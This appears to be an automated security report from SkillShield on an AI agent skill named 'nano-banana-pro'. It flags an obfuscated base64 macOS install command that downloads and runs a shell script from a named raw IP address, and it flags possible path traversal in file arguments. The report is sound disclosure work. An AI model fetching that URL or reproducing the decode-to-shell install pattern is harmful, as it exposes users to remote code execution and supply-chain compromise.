Trust Assessment
nano-banana-pro received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 0 high, 1 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Obfuscated Remote Code Execution during MacOS Installation, Potential Path Traversal via Unsanitized File Path Arguments.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 63/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/nano-banana-pro-srlqfn/SKILL.md:10 | |
| CRITICAL | Obfuscated Remote Code Execution during MacOS Installation The MacOS installation instructions include a base64 encoded command that, when decoded, downloads and executes a shell script from an arbitrary IP address (`http://91.92.242.30/tjjve9itarrd3txw`). This allows for arbitrary code execution on the user's system without explicit review, posing a severe supply chain risk and a direct command injection vulnerability. The use of base64 encoding also constitutes hidden instructions. Remove the obfuscated remote code execution command. Provide clear, auditable installation instructions, preferably using a package manager or a script hosted on a trusted, version-controlled platform. Ensure all external script sources use HTTPS. | LLM | SKILL.md:13 | |
| MEDIUM | Potential Path Traversal via Unsanitized File Path Arguments The skill's usage examples show that user-provided values for `--filename` and `--input-image` are directly passed to the `generate_image.py` script. The documentation explicitly states that `--filename` can include directory components. If the Python script does not properly sanitize these arguments against path traversal sequences (e.g., `../`), a malicious user could specify paths outside the intended working directory. This could lead to arbitrary file writes (via `--filename`) or arbitrary file reads (via `--input-image`), potentially exfiltrating sensitive data or overwriting critical system files. The `generate_image.py` script must implement robust input validation and sanitization for all file path arguments (`--filename`, `--input-image`). It should resolve paths to ensure they remain within an allowed, sandboxed directory, or at minimum, normalize paths to prevent traversal attacks. | LLM | SKILL.md:23 |
Scan History
Embed Code
[](https://skillshield.io/report/d6b13eef25fd14d0)
Powered by SkillShield